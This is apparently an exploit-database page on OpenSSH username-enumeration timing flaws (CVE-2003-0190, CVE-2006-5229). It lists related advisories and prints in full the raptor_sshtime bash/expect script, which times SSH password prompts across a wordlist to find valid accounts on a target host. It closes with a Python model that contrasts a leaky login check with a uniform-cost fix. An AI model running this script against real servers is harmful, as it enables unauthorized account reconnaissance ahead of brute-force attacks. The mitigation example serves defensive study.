| Title | Published | Views | Reporter |
|---|---|---|---|
| Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit | 13 Feb 2007 00:00 | – | zdt |
| Portable OpenSSH < 3.6.1p2 PAM Timing Side-Channel Weakness | 20 Aug 2004 00:00 | – | nessus |
| OpenSSH < 4.4 Multiple Vulnerabilities | 28 Sep 2006 00:00 | – | nessus |
| OpenSSH < 4.1.0p2 / 4.2 Timing Attack | 10 Oct 2006 00:00 | – | nessus |
| OpenSSH < 4.4 Multiple Vulnerabilities | 28 Sep 2006 00:00 | – | nessus |
| OpenSSH w/ PAM Multiple Timing Attack Weaknesses | 6 May 2003 00:00 | – | nessus |
| RHEL 2.1 : openssh (RHSA-2003:224) | 6 Jul 2004 00:00 | – | nessus |
| SunSSH < 1.1.1 / 1.3 CBC Plaintext Disclosure | 29 Aug 2011 00:00 | – | nessus |
| Siemens SCALANCE X-200RNA Switch Devices Observable Timing Discrepancy (CVE-2003-0190) | 13 Mar 2025 00:00 | – | nessus |
| Siemens SCALANCE X-200RNA Switch Devices Concurrent Execution Using Shared Resource with Improper Synchronization (CVE-2003-1562) | 13 Mar 2025 00:00 | – | nessus |

```bash
#!/bin/bash
#
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
#
# raptor_sshtime - [Open]SSH remote timing attack exploit
# Copyright (c) 2006 Marco Ivaldi <[email protected]>
#
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
# sends an error message when a user does not exist, which allows remote
# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
#
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
# and possibly under limited configurations, allows remote attackers to
# determine valid usernames via timing discrepancies in which responses take
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
# NOTE: as of 20061014, it appears that this issue is dependent on the use of
# manually-set passwords that causes delays when processing /etc/shadow due to
# an increased number of rounds (CVE-2006-5229).
#
# This is a simple shell script based on expect meant to remotely analyze
# timing differences in sshd "Permission denied" replies. Depending on OpenSSH
# version and configuration, it may lead to disclosure of valid usernames.
#
# Usage example:
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#

# Some vars
port=22

# Command line
host=$1
dict=$2

# Local functions
function head() {
	echo ""
	echo "raptor_sshtime - [Open]SSH remote timing attack exploit"
	echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>"
	echo ""
}

function foot() {
	echo ""
	exit 0
}

function usage() {
	head
	echo "[make sure the target hostkey has been approved before]"
	echo ""
	echo "usage  : ./sshtime <target> <wordlist>"
	echo "example: ./sshtime 192.168.0.1 dict.txt"
	foot
}

function notfound() {
	head
	echo "error  : expect interpreter not found!"
	foot
}

# Check if expect is there
expect=`which expect 2>/dev/null`
if [ $? -ne 0 ]; then
	notfound
fi

# Input control
if [ -z "$2" ]; then
	usage
fi

# Perform the bruteforce attack
head
for user in `cat $dict`
do
	echo -ne "$user@$host\t\t"
	(time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
done
foot

# milw0rm.com [2007-02-13]
```
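
The script header describes two leaks: an immediate reply for unknown users (CVE-2003-0190) and slower replies for accounts whose hash uses a raised round count (CVE-2006-5229). The Python model below is an added example, not code from OpenSSH or from the script's author, showing a leaky password check beside one that spends the same work on every attempt. The account names, round counts, the PBKDF2 stand-in for crypt(3) and all function names are assumptions; KDF rounds are counted as a deterministic proxy for response time.

```python
import hashlib
import hmac
import os

work = [0]  # KDF rounds spent per login attempt: a deterministic proxy for reply time


def kdf(password: str, salt: bytes, rounds: int) -> bytes:
    work[-1] += rounds
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)


def make_entry(password: str, rounds: int) -> tuple:
    salt = os.urandom(16)
    return (salt, rounds, kdf(password, salt, rounds))


# Constructed account database: "alice" uses a default cost, "bob" a manually
# raised one (the CVE-2006-5229 situation described in the script header).
SHADOW = {"alice": make_entry("correct horse", 1_000),
          "bob": make_entry("battery staple", 20_000)}
MAX_ROUNDS = max(rounds for _, rounds, _ in SHADOW.values())
DUMMY = make_entry(os.urandom(16).hex(), MAX_ROUNDS)  # stand-in entry for unknown users


def login_leaky(user: str, password: str) -> bool:
    """Early return for unknown users: no hashing, so the reply comes back sooner."""
    work.append(0)
    if user not in SHADOW:
        return False
    salt, rounds, digest = SHADOW[user]
    return hmac.compare_digest(kdf(password, salt, rounds), digest)


def login_uniform(user: str, password: str) -> bool:
    """Every attempt, valid user or not, pays MAX_ROUNDS before the reply."""
    work.append(0)
    salt, rounds, digest = SHADOW.get(user, DUMMY)
    ok = hmac.compare_digest(kdf(password, salt, rounds), digest)
    if rounds < MAX_ROUNDS:  # pad cheaper accounts up to the common cost
        kdf(password, salt, MAX_ROUNDS - rounds)
    return ok and user in SHADOW


def cost(login, user: str) -> int:
    login(user, "dummy")  # same throwaway password the script above sends
    return work[-1]
```

With the leaky check, `cost` separates the three cases (unknown user, default-cost account, raised-cost account); with the uniform check all three cost `MAX_ROUNDS`. Padding with a second KDF call is a simplification of the model; rehashing every account to one cost removes the need for it.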